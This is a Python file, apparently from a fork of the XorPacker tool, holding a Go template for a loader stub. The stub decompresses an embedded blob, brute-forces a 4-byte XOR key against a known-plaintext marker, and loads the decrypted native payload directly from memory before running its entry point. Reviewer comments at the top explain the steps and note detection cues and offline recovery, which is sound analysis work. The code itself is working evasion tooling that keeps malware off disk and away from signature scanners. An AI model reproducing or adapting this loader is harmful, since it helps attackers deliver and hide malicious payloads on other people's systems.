forked from tmenochet/XorPacker
stub_unmanaged_go.py
# Go source template for the loader stub that wraps an unmanaged (native) payload.
#
# NOTE(review): the doubled braces and the {0}/{1} slots indicate this string is
# meant to be filled with str.format(); the code that fills it is not visible here.
#   {0} - base64 text decoded into `compressed`: a zlib stream that inflates to
#         the XOR-obfuscated payload.
#   {1} - base64 text decoded into `known_bytes`: the value compared against
#         bytes 128..131 of every candidate plaintext.
#
# What the generated program does, in order:
#   1. Base64-decodes both embedded values and zlib-inflates the first one.
#      Every error return on this path is discarded with `_`.
#   2. bf_xor() counts a uint32 up from 0, writes it little-endian into a
#      4-byte repeating XOR key and applies it to block[0:1000] (so it assumes
#      the inflated block holds at least 1000 bytes). When bytes 128..131 equal
#      known_bytes, it repeats the XOR over the whole block with the same key
#      and returns that buffer. The template embeds no key, only the marker.
#      The loop has no upper bound: if no key matches, k wraps and it never ends.
#   3. Passes the decrypted buffer to MemoryLoadLibraryEx, then calls
#      MemoryCallEntryPoint and MemoryFreeLibrary through cgo. `import "C"` has
#      no preamble in this template, so those symbols must be supplied by the
#      build - presumably the MemoryModule library; confirm against the packer.
#   4. Copies os.Args into C strings (cArgs); the visible code neither passes
#      them on nor frees them.
#
# Analyst notes: the payload is only present in decrypted form in process
# memory, so hash or string matching on the original payload does not apply to
# the built stub. What stays observable is a large base64 literal in a cgo-built
# Go binary, a CPU-bound loop that precedes any module load, and (if step 3 is
# MemoryModule) an image mapped from private memory with no backing file.
# Because the key is 32 bits and the check is a 4-byte known-plaintext compare,
# the payload can be recovered offline from a sample by running the same search
# over the inflated blob.
loader="""
package main
import "C"
import (
"bytes"
"encoding/binary"
"encoding/base64"
"compress/zlib"
"io"
"unsafe"
"os"
)
func bf_xor(block []byte, known_bytes []byte) []byte {{
encrypted := block[0:1000]
decrypted := make([]byte, len(encrypted))
key := make([]byte, 4)
var k uint32 = 0
for {{
binary.LittleEndian.PutUint32(key, k)
for i, ch := range encrypted {{
decrypted[i] = (ch ^ (key[i % len(key)]))
}}
if bytes.Compare(decrypted[128:132], known_bytes) == 0 {{
if len(decrypted) == len(block) {{
break
}} else {{
encrypted = block
decrypted = make([]byte, len(block))
}}
}} else {{
k += 1
}}
}}
return decrypted
}}
func main() {{
compressed, _ := base64.StdEncoding.DecodeString("{0}")
known_bytes, _ := base64.StdEncoding.DecodeString("{1}")
var b1, b2 bytes.Buffer
b1.Write([]byte(compressed))
r, _ := zlib.NewReader(&b1)
io.Copy(&b2, r)
r.Close()
encrypted := b2.Bytes()
payload := bf_xor(encrypted, known_bytes)
var cArgs []*C.char
for _, goString := range os.Args {{
cArgs = append(cArgs, C.CString(goString))
}}
handle := C.MemoryLoadLibraryEx(unsafe.Pointer(&payload[0]),
(C.size_t)(len(payload)),
(*[0]byte)(C.MemoryDefaultAlloc),
(*[0]byte)(C.MemoryDefaultFree),
(*[0]byte)(C.MemoryDefaultLoadLibrary),
(*[0]byte)(C.MemoryDefaultGetProcAddress),
(*[0]byte)(C.MemoryDefaultFreeLibrary),
unsafe.Pointer(nil),
)
C.MemoryCallEntryPoint(handle)
C.MemoryFreeLibrary(handle)
}}
"""